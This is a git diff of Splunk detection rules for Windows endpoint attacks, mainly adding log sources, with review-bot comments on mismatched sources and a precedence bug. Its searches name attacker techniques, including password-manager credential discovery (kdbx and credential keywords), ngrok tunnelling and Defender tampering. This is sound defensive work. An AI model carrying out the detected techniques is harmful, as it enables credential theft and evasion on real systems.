index 1822366cb3..be3d23dcb8 100644
--- a/detections/endpoint/windows_modify_registry_longpathsenabled.yml
+++ b/detections/endpoint/windows_modify_registry_longpathsenabled.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a modification to the Windows registry
setting "LongPathsEnabled," which allows file paths longer than 260 characters.
diff --git a/detections/endpoint/windows_modify_registry_maxconnectionperserver.yml b/detections/endpoint/windows_modify_registry_maxconnectionperserver.yml
index effdb82672..3da3cb3c99 100644
--- a/detections/endpoint/windows_modify_registry_maxconnectionperserver.yml
+++ b/detections/endpoint/windows_modify_registry_maxconnectionperserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic identifies a suspicious modification of the Windows
registry setting for max connections per server. It detects changes to specific
diff --git a/detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml b/detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml
index a9825acf86..e961a39544 100644
--- a/detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml
+++ b/detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a suspicious modification to the Windows
registry that disables automatic reboot with a logged-on user. This detection leverages
diff --git a/detections/endpoint/windows_modify_registry_no_auto_update.yml b/detections/endpoint/windows_modify_registry_no_auto_update.yml
index 068495e512..f4edf71299 100644
--- a/detections/endpoint/windows_modify_registry_no_auto_update.yml
+++ b/detections/endpoint/windows_modify_registry_no_auto_update.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic identifies a suspicious modification to the Windows
registry that disables automatic updates. It detects changes to the registry path
diff --git a/detections/endpoint/windows_modify_registry_nochangingwallpaper.yml b/detections/endpoint/windows_modify_registry_nochangingwallpaper.yml
index 1b2fba591d..0004e9f3de 100644
--- a/detections/endpoint/windows_modify_registry_nochangingwallpaper.yml
+++ b/detections/endpoint/windows_modify_registry_nochangingwallpaper.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
aimed at preventing wallpaper changes. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_proxyenable.yml b/detections/endpoint/windows_modify_registry_proxyenable.yml
index 1c7713ebe9..60f720e50c 100644
--- a/detections/endpoint/windows_modify_registry_proxyenable.yml
+++ b/detections/endpoint/windows_modify_registry_proxyenable.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
key "ProxyEnable" to enable proxy settings. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_proxyserver.yml b/detections/endpoint/windows_modify_registry_proxyserver.yml
index 83f4e5bae7..5870318cda 100644
--- a/detections/endpoint/windows_modify_registry_proxyserver.yml
+++ b/detections/endpoint/windows_modify_registry_proxyserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the Windows registry
key for setting up a proxy server. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml b/detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml
index b5232301d2..a91ab6e4ea 100644
--- a/detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml
+++ b/detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml
@@ -14,9 +14,8 @@ description: The following analytic detects the creation of a suspicious registr
data. If confirmed malicious, this could allow attackers to maintain persistence
and execute arbitrary code on the compromised system.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count dc(registry_value_name) as
registry_value_name_count FROM datamodel=Endpoint.Registry where Registry.registry_path="*\\SOFTWARE\\Microsoft\\*"
AND Registry.registry_value_data = "Binary Data" by _time span=1m Registry.dest
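Review bot: The rewritten data_source entries `Sysmon EventID 1 AND Sysmon EventID 12` / `Sysmon EventID 1 AND Sysmon EventID 13` claim a process-creation dependency that the visible search does not show — it reads only `datamodel=Endpoint.Registry` with no Processes join in the hunk, so the Sysmon EventID 1 requirement is unexplained. If the search later correlates with process events, say so where the dependency is introduced; otherwise the plain `- Sysmon EventID 12` / `- Sysmon EventID 13` entries used by the neighbouring detections are the accurate description. The compound string also presumably has to resolve against a definition under data_sources/ for contentctl's validation — worth confirming, since every other hunk here uses single event names. The search continues past the hunk.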
diff --git a/detections/endpoint/windows_modify_registry_reg_restore.yml b/detections/endpoint/windows_modify_registry_reg_restore.yml
index d1a53adcac..961ae033b1 100644
--- a/detections/endpoint/windows_modify_registry_reg_restore.yml
+++ b/detections/endpoint/windows_modify_registry_reg_restore.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of reg.exe with the "r
potentially bypassing security controls and maintaining persistence.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process
= "* restore *" by Processes.process_name Processes.original_file_name Processes.process
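Review bot: The added `Windows Event Log Security 4688` source will only feed this analytic when command-line auditing is enabled, because the search two lines below keys on `Processes.process = "* restore *"` and 4688 carries the command line solely when the "Include command line in process creation events" policy is on; without it the new source is listed but silently contributes nothing. CrowdStrike ProcessRollup2 carries the command line natively, so that addition stands on its own. Suggest recording the prerequisite in the detection's implementation notes (outside the hunk), e.g. `For Security 4688, command-line auditing must be enabled or this search will not match.` The search continues past the hunk.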
diff --git a/detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml b/detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml
index fbdb72e48b..6bcd169e25 100644
--- a/detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml
+++ b/detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of the Windows regi
configurations, leading to potential system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where (Processes.process_name="regedit.exe" OR Processes.original_file_name="regedit.exe")
diff --git a/detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml b/detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml
index c863f2df58..f3317d9729 100644
--- a/detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml
+++ b/detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications in the Windows registr
detection, maintain persistence, and execute further malicious activities without
alerting the user or security tools.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Windows
diff --git a/detections/endpoint/windows_modify_registry_tamper_protection.yml b/detections/endpoint/windows_modify_registry_tamper_protection.yml
index d35c5a3f93..260fd5ba85 100644
--- a/detections/endpoint/windows_modify_registry_tamper_protection.yml
+++ b/detections/endpoint/windows_modify_registry_tamper_protection.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a suspicious modification to the Windows
Defender Tamper Protection registry setting. It leverages data from the Endpoint
diff --git a/detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml b/detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml
index 60b4641bd4..e9d8f22e58 100644
--- a/detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml
+++ b/detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a suspicious modification to the Windows
Update configuration registry key, specifically targeting the UpdateServiceUrlAlternate
diff --git a/detections/endpoint/windows_modify_registry_usewuserver.yml b/detections/endpoint/windows_modify_registry_usewuserver.yml
index acbbb57bfa..5b4c591d67 100644
--- a/detections/endpoint/windows_modify_registry_usewuserver.yml
+++ b/detections/endpoint/windows_modify_registry_usewuserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Hunting
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects a suspicious modification to the Windows
Update configuration registry key "UseWUServer." It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml b/detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml
index 5c29de3e84..14a104ee88 100644
--- a/detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml
+++ b/detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects potentially malicious registry modifications
characterized by MD5-like registry key names. It leverages the Endpoint data model
diff --git a/detections/endpoint/windows_modify_registry_wuserver.yml b/detections/endpoint/windows_modify_registry_wuserver.yml
index 3c71d7f3fc..c67ea368a9 100644
--- a/detections/endpoint/windows_modify_registry_wuserver.yml
+++ b/detections/endpoint/windows_modify_registry_wuserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Hunting
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects suspicious modifications to the Windows
Update Server (WUServer) registry settings. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_wustatusserver.yml b/detections/endpoint/windows_modify_registry_wustatusserver.yml
index 92790bcc74..c347ac54e5 100644
--- a/detections/endpoint/windows_modify_registry_wustatusserver.yml
+++ b/detections/endpoint/windows_modify_registry_wustatusserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Hunting
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic identifies suspicious modifications to the Windows
Update configuration registry, specifically targeting the WUStatusServer key. It
diff --git a/detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml b/detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml
index 4f97037742..80738ab935 100644
--- a/detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml
+++ b/detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to the Wind
elements. If confirmed malicious, this could signify an attempt to manipulate file
visibility and deceive users, potentially aiding in further malicious activities.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path = "*\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced*"
diff --git a/detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml b/detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml
index be273fc785..6e4a52b436 100644
--- a/detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml
+++ b/detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects suspicious modifications to system firewall
rules, specifically allowing execution of applications from notable and potentially
malicious file paths. This detection leverages data from Endpoint Detection and
diff --git a/detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml b/detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml
index ba34e91262..570b766e26 100644
--- a/detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml
+++ b/detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of MOFComp.exe loading
code, maintain persistence, or escalate privileges within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
IN ("cmd.exe", "powershell.exe") Processes.process_name=mofcomp.exe) OR (Processes.process_name=mofcomp.exe
diff --git a/detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml b/detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml
index e2f281fa89..707a655921 100644
--- a/detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml
+++ b/detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies suspicious Cmdlet usage in Exchan
new roles, or search mailboxes, leading to data breaches and privilege escalation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '`msexchange_management` EventCode=1 Message IN ("*New-MailboxExportRequest*",
"*New-ManagementRoleAssignment*", "*New-MailboxSearch*", "*Get-Recipient*", "*Search-Mailbox*")
| stats count min(_time) as firstTime max(_time) as lastTime by host Message | `security_content_ctime(firstTime)`
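Review bot: The two added data sources do not match the search that follows: it runs `` `msexchange_management` EventCode=1 Message IN (...) `` against the MSExchange Management event log rather than the Endpoint.Processes data model, so neither Security 4688 nor CrowdStrike ProcessRollup2 (and arguably not Sysmon EventID 1 either) can feed this analytic. Listing them misleads anyone using data_source to plan onboarding and, if contentctl validates names against data_sources/, may pass validation while still being wrong. Suggest dropping the two added lines and naming the actual log, e.g. `- Windows Event Log MSExchange Management`, provided a matching definition exists under data_sources/. The search continues past the hunk.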
diff --git a/detections/endpoint/windows_mshta_execution_in_registry.yml b/detections/endpoint/windows_mshta_execution_in_registry.yml
index 49612a23f0..4100435773 100644
--- a/detections/endpoint/windows_mshta_execution_in_registry.yml
+++ b/detections/endpoint/windows_mshta_execution_in_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the execution of mshta.exe via regis
arbitrary code, and evade traditional file-based detection methods, posing a significant
threat to system integrity and security.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_value_data
diff --git a/detections/endpoint/windows_msiexec_dllregisterserver.yml b/detections/endpoint/windows_msiexec_dllregisterserver.yml
index 6e4cbd104a..25d55657ca 100644
--- a/detections/endpoint/windows_msiexec_dllregisterserver.yml
+++ b/detections/endpoint/windows_msiexec_dllregisterserver.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of msiexec.exe with th
maintain persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_msiexec` Processes.process
IN ("*/y*", "*-y*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml b/detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml
index c26455606b..2e2a73f927 100644
--- a/detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml
+++ b/detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of the msiexec.exe process
with the /HideWindow and rundll32 command-line parameters. It leverages data from
Endpoint Detection and Response (EDR) agents, focusing on process creation events
diff --git a/detections/endpoint/windows_msiexec_remote_download.yml b/detections/endpoint/windows_msiexec_remote_download.yml
index 39c2e2562b..2b7f246cee 100644
--- a/detections/endpoint/windows_msiexec_remote_download.yml
+++ b/detections/endpoint/windows_msiexec_remote_download.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of msiexec.exe with an HTTP
execution, system compromise, or further malware deployment within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_msiexec` Processes.process
IN ("*http://*", "*https://*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_msiexec_spawn_discovery_command.yml b/detections/endpoint/windows_msiexec_spawn_discovery_command.yml
index 4feab4b691..0367683bf1 100644
--- a/detections/endpoint/windows_msiexec_spawn_discovery_command.yml
+++ b/detections/endpoint/windows_msiexec_spawn_discovery_command.yml
@@ -15,6 +15,8 @@ description: The following analytic detects MSIExec spawning multiple discovery
within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=msiexec.exe
Processes.process_name IN ("powershell.exe","cmd.exe", "nltest.exe","ipconfig.exe","systeminfo.exe")
diff --git a/detections/endpoint/windows_msiexec_spawn_windbg.yml b/detections/endpoint/windows_msiexec_spawn_windbg.yml
index 39ee45ee9c..1243cdbe4e 100644
--- a/detections/endpoint/windows_msiexec_spawn_windbg.yml
+++ b/detections/endpoint/windows_msiexec_spawn_windbg.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the unusual behavior of MSIExec spawning
WinDBG. It detects this activity by analyzing endpoint telemetry data, specifically
looking for instances where 'msiexec.exe' is the parent process of 'windbg.exe'.
diff --git a/detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml b/detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml
index 1f5f0b29a2..30e7efb7dd 100644
--- a/detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml
+++ b/detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of msiexec.exe with the /z s
system functionality, leading to further compromise of the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_msiexec` Processes.process
IN ("*/z*", "*-z*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_msiexec_with_network_connections.yml b/detections/endpoint/windows_msiexec_with_network_connections.yml
index b86543a515..fde323dc9b 100644
--- a/detections/endpoint/windows_msiexec_with_network_connections.yml
+++ b/detections/endpoint/windows_msiexec_with_network_connections.yml
@@ -14,7 +14,7 @@ description: The following analytic detects MSIExec making network connections o
potentially leading to data exfiltration, command and control (C2) communication,
or further malware deployment.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where `process_msiexec` by _time Processes.user Processes.process_id Processes.process_name
Processes.dest Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/windows_ngrok_reverse_proxy_usage.yml b/detections/endpoint/windows_ngrok_reverse_proxy_usage.yml
index b66eded1e2..e0f670b1ed 100644
--- a/detections/endpoint/windows_ngrok_reverse_proxy_usage.yml
+++ b/detections/endpoint/windows_ngrok_reverse_proxy_usage.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of ngrok.exe on a Wind
or facilitate further attacks by tunneling traffic through the compromised system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=ngrok.exe
Processes.process IN ("*start*", "*--config*","*http*","*authtoken*", "*http*",
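Review bot: `"*http*"` appears twice in the `Processes.process IN (...)` list on the last line of the hunk; the duplicate is harmless to SPL but suggests the list was not reviewed, and it should be deduplicated to `Processes.process IN ("*start*", "*--config*","*http*","*authtoken*",` with the remaining patterns following. Because this detection depends entirely on command-line content, the newly added `Windows Event Log Security 4688` source only contributes when command-line auditing is enabled — a caveat worth noting in the implementation notes, since a plain 4688 feed will match nothing here. The IN list and the rest of the search continue past the hunk.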
diff --git a/detections/endpoint/windows_nirsoft_advancedrun.yml b/detections/endpoint/windows_nirsoft_advancedrun.yml
index f903662971..84c78b5116 100644
--- a/detections/endpoint/windows_nirsoft_advancedrun.yml
+++ b/detections/endpoint/windows_nirsoft_advancedrun.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of AdvancedRun.exe, a
privileges, or maintain persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=advancedrun.exe
OR Processes.original_file_name=advancedrun.exe) Processes.process IN ("*EXEFilename*","*/cfg*","*RunAs*",
diff --git a/detections/endpoint/windows_nirsoft_utilities.yml b/detections/endpoint/windows_nirsoft_utilities.yml
index b6b1493fca..cae71dc40f 100644
--- a/detections/endpoint/windows_nirsoft_utilities.yml
+++ b/detections/endpoint/windows_nirsoft_utilities.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the execution of commonly used Ni
could lead to unauthorized access, data exfiltration, or further system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.parent_process_name
Processes.process_name Processes.process Processes.original_file_name Processes.process_path
diff --git a/detections/endpoint/windows_njrat_fileless_storage_via_registry.yml b/detections/endpoint/windows_njrat_fileless_storage_via_registry.yml
index d35c591ffe..75586bd532 100644
--- a/detections/endpoint/windows_njrat_fileless_storage_via_registry.yml
+++ b/detections/endpoint/windows_njrat_fileless_storage_via_registry.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects suspicious registry modifications indicative
of NjRat's fileless storage technique. It leverages the Endpoint.Registry data model
diff --git a/detections/endpoint/windows_odbcconf_hunting.yml b/detections/endpoint/windows_odbcconf_hunting.yml
index 436f7d902a..d0b037f761 100644
--- a/detections/endpoint/windows_odbcconf_hunting.yml
+++ b/detections/endpoint/windows_odbcconf_hunting.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of Odbcconf.exe wit
privileges, posing a significant threat to the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=odbcconf.exe
by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_odbcconf_load_dll.yml b/detections/endpoint/windows_odbcconf_load_dll.yml
index e1b1a3efc6..c14bfc2a35 100644
--- a/detections/endpoint/windows_odbcconf_load_dll.yml
+++ b/detections/endpoint/windows_odbcconf_load_dll.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of odbcconf.exe with t
movement.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=odbcconf.exe
Processes.process IN ("*/a *", "*-a*") Processes.process="*regsvr*" by Processes.dest
diff --git a/detections/endpoint/windows_odbcconf_load_response_file.yml b/detections/endpoint/windows_odbcconf_load_response_file.yml
index 126f117ddd..1067f4314a 100644
--- a/detections/endpoint/windows_odbcconf_load_response_file.yml
+++ b/detections/endpoint/windows_odbcconf_load_response_file.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of odbcconf.exe with a
environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=odbcconf.exe
Processes.process IN ("*-f *","*/f *") Processes.process="*.rsp*" by Processes.dest
diff --git a/detections/endpoint/windows_office_product_spawning_msdt.yml b/detections/endpoint/windows_office_product_spawning_msdt.yml
index bf57ad3258..4977b332f7 100644
--- a/detections/endpoint/windows_office_product_spawning_msdt.yml
+++ b/detections/endpoint/windows_office_product_spawning_msdt.yml
@@ -15,6 +15,8 @@ description: The following analytic detects a Microsoft Office product spawning
movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("winword.exe","excel.exe","powerpnt.exe","outlook.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe")
diff --git a/detections/endpoint/windows_papercut_ng_spawn_shell.yml b/detections/endpoint/windows_papercut_ng_spawn_shell.yml
index e738167a8d..720d9addcc 100644
--- a/detections/endpoint/windows_papercut_ng_spawn_shell.yml
+++ b/detections/endpoint/windows_papercut_ng_spawn_shell.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects instances where the PaperCut NG application
(pc-app.exe) spawns a Windows shell, such as cmd.exe or PowerShell. This behavior
is identified using Endpoint Detection and Response (EDR) telemetry, focusing on
diff --git a/detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml b/detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml
index 93b1e11509..145c0623b7 100644
--- a/detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml
+++ b/detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies a suspicious `explorer.exe` process
with the `/root` command-line parameter. This detection leverages Endpoint Detection
and Response (EDR) telemetry, focusing on process and command-line data. The presence
diff --git a/detections/endpoint/windows_password_managers_discovery.yml b/detections/endpoint/windows_password_managers_discovery.yml
index 05abef9387..a3bdf3b310 100644
--- a/detections/endpoint/windows_password_managers_discovery.yml
+++ b/detections/endpoint/windows_password_managers_discovery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies command-line activity that search
laterally, or exfiltrate critical data.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process = "*dir *"
OR Processes.process = "*findstr*" AND Processes.process IN ( "*.kdbx*", "*credential*",
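Review bot: The where clause on the last two lines mixes OR and AND without parentheses: `Processes.process = "*dir *" OR Processes.process = "*findstr*" AND Processes.process IN (...)`. AND binds tighter than OR in SPL, so this evaluates as `"*dir *" OR ("*findstr*" AND IN(...))` and every command line containing `dir ` matches regardless of the keyword list — which will become very noisy once the added 4688 and ProcessRollup2 sources bring in full command lines. Wrap the first two terms: `where (Processes.process = "*dir *" OR Processes.process = "*findstr*") AND Processes.process IN (`. The IN list and the rest of the search continue past the hunk, so confirm the closing parenthesis is placed accordingly.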
diff --git a/detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml b/detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml
index 6c254b3742..96e4214e77 100644
--- a/detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml
+++ b/detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml
@@ -14,6 +14,8 @@ description: The following analytic detects suspicious PDF viewer processes spaw
environment by exploiting the user's browser to connect to a malicious site.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN
("AcroRd32.exe", "FoxitPDFReader.exe") Processes.process_name IN ("firefox.exe",
diff --git a/detections/endpoint/windows_phishing_recent_iso_exec_registry.yml b/detections/endpoint/windows_phishing_recent_iso_exec_registry.yml
